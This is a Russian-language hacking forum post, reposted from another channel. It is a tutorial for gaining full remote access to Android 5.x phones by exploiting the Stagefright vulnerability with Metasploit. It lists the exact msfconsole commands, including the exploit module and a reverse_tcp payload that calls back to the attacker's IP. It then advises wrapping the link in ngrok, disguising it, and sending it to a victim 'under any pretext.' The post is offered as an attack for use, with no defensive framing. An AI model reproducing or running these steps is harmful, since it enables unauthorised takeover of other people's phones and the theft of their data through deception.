Получаем полный доступ к телефону через ссылкуПривет, друзья. Сегодня мы будем ...

  • Автор темы R@Va
  • Дата начала
  • Участники 0

R@Va

Elite Hacker-L33T-1337
24.06.2020
8 278
0
73
Forwarded From Черная маска

https://telegra.ph/file/dbc0309a6788c407e98cd.jpgПолучаем полный доступ к телефону через ссылку

Привет, друзья. Сегодня мы будем использовать утилиту под названием Metasploit. С ее помощью можно получить полный удалённый доступ к смартфону на Android.

Эксплуатировать будем уязвимость - Stagefright. Она актуальна на относительно старых версиях Android (5.0 - 5.1.1).

Инструкция по установке:
Установка Metasploit на Termux — ТЫК
Установка Metasploit на Linux — ТЫК
Если у вас Kali Linux, то Metasploit уже стоит из коробки.
Если Stagefright нет в Metasploit, то скачиваем его — ТЫК и закидываем в папку с эксплоитами.

Использование:
msfconsole — открытие консоли
use exploit/android/browser/stagefright_mp4_tx3g_64bit — подключение эксплоита
set SRVHOST вашIP
set URIPATH /
set PAYLOAD linux/armle/mettle/reverse_tcp
set LHOST вашIP
set VERBOSE true
exploit -j — запуск эксплоита

Сгенерируется ссылка, которую надо завернуть в ngrok, а потом неплохо было бы замаскировать — ТЫК.
После этого нужно отправить готовую ссылку под любым предлогом, а при переходе по ссылке откроется новая сессия для удалённого доступа.

 

Об LS-LA

  • Мы, группа единомышленников, основная цель которых повышать уровень знаний и умений.
    Не забывая о материальном благополучии каждого)

About LS-LA

  • We, a group of like-minded people, whose main goal is to increase the level of knowledge and skills.
    Not forgetting about everyone’s material well-being)

Быстрая навигация

Пользовательское меню